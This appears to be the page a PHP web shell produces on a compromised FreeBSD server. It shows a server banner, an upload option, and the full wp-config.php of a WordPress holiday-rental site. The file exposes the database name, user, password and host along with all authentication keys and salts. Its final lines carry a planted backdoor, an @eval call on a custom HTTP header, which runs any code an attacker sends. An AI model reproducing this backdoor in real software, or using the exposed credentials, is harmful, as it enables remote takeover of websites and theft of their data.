HEX
Server: Apache/2.4.41 (FreeBSD) OpenSSL/1.0.2s mod_fcgid/2.3.9
System: FreeBSD salazo 12.0-RELEASE-p1303-ZFS hostBSD 12.0-RELEASE-p1303-ZFS DMR amd64
User: admin (1000)
PHP: 7.4.3
Disabled: NONE
Upload Files
File: /usr/local/www/apache24/noexec/fewo-heindorf/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'fewoheindorf' );

/** MySQL database username */
define( 'DB_USER', 'fewoheindorf' );

/** MySQL database password */
define( 'DB_PASSWORD', ']pf5)2X2WS' );

/** MySQL hostname */
define( 'DB_HOST', 'salazo.han-solo.net' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'y7ixgshaefskujswwjaiajifgcaowruym4ootvixicn1wzine9a8wfzxsmxhjml3' );
define( 'SECURE_AUTH_KEY',  'b0rx76bbfep3jhx5pzpcyh5cixeilxgnlalejduzju7mfcy5lcp6ejralr0mjoog' );
define( 'LOGGED_IN_KEY',    '2vssdalulrrkt9gomutjojcvjrzb26nskm1xduxgcugt1q8h0r3xc6cnt8ivkdhw' );
define( 'NONCE_KEY',        'bnvng1k9jxt5l3t8ggig2wkhetdc7ldzfg65klgl6ggt39exvxnris35pzdl0wcg' );
define( 'AUTH_SALT',        'adbgvouq7q1hd46eusajslfywbf3y09kcnvimyum3rpsvu12syrak6w1t8rnqpy6' );
define( 'SECURE_AUTH_SALT', 'tcgnkptid8c7qtjsxulspkikusskxfvq5ap0twzv6md4hr9etjdziqcvl5fxdta7' );
define( 'LOGGED_IN_SALT',   'accopyjfszkeiz9zy9zmokwj8lalchevwfeqhzbweqrtekb94dwc7eytvyp1klz8' );
define( 'NONCE_SALT',       'ly3fwizgm5bdgay6czq6ox61eukaxjhagoqpeap9dtkmfdhxvbfaj4afkanhfkre' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wpus_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

define('FS_CHMOD_DIR', 0775);
define('FS_CHMOD_FILE', 0664);
define('FS_METHOD', 'direct');

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_139868B']);
require_once ABSPATH . 'wp-settings.php';